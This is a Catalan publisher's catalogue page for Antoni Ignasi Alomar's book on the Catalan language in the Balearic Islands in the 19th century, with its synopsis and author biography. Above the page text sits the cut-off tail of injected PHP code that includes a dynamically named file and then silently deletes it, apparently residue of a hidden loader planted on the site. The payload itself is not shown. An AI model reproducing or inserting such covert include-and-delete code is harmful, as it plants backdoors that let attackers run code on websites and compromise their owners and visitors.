");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - La llengua catalana a les Balears en el segle XIX
Cercador d'Obres
ORDENAR:
Començar recerca

La llengua catalana a les Balears en el segle XIX

Alomar i Canyelles, Antoni Ignasi

Col·lecció:
Quaderns d'Història Contemporània de les Balears
Tema:
Història contemporània
Pàgines:
64
PVP:
4.00
ISBN:
84-89067-75-9
Data d'Edició:
11/03/2000
Sinopsi
Durant el segle xix la llengua catalana passà a les Balears per tres etapes ben diferenciades. Si durant els primers decennis de la centúria es mantingué l’ús predominant del català, en els anys trenta hi hagué una acceleració de l’espanyolització. El final de segle va estar marcat pel començament de la recuperació nacional i lingüística de Mallorca, mentre Menorca perdia el lideratge cultural del segle xviii i Eivissa restava en posició doblement marginal.
Antoni Ignasi Alomar i Canyelles
(1962) És llicenciat en Filologia Catalana per la UIB. Ha publicat diversos treballs de filologia, sociolingüística i història de l’art. Cal destacar-ne la seva tesi doctoral: El lèxic de l’armament a l’illa de Mallorca als segles XIX i XV: estudi de la seva terminologia. Ha publicat en aquesta mateixa editorial Les armes mítiques de Jaume I (1994),  L’exèrcit mallorquí. De la fi de l’edat mitjana a la seva desaparició (1998), L’Estendard, la festa nacional més antiga d’Europa (1998), La llengua catalana a les Balears en el segle XIX (2000), La llengua catalana a les Balears en el segle XX (2002) i Pràctiques de transcripció fonètica (2002)
Recomanar
Comentar
Comentaris (0)